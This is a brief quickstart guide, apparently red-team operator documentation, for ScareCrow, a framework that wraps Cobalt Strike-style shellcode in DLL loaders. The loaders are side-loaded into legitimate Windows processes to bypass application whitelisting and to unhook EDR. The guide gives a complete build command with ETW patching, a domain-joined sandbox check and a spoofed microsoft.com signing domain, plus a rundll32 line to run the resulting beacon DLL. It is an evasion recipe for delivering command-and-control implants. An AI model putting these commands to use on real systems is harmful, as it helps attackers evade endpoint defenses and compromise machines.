ScareCrow is…

a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process’s memory.

Quickstart

  1. See ScareCrow for installation if working from an image where the binary has not already been installed (check via which scarecrow if on Linux).
  2. Generate x64 shellcode
  • Note: In theory, this should work with any x64 shellcode but only Cobalt Strike’s shellcode has been tested by the author.
  3. Select your desired configuration options and pass the shellcode to the ScareCrow utility.

Example Command (DLL)

This example creates a DLL. See other -Loader options using the above link for alternative formats.

Assuming the target shellcode is written to a file in the current directory named shellcode.bin, the following command generates a DLL file:

scarecrow -etw -sandbox \
  -Loader dll \
  -domain microsoft.com \
  -I shellcode.bin \
  -O beacon.dll

WARNINGS

The above command can throw an operator off while testing the payload, for the following reasons, so it may be desirable to alter the command accordingly:

  • -sandbox makes the payload check that the host executing the binary is domain joined; it will not run on a non-domain-joined test machine
  • When executed from the command line, no window will be displayed. Use the -console flag if a window is desired.

Testing the DLL Payload

Cobalt Strike offers this in their documentation:

rundll32 beacon.dll,Start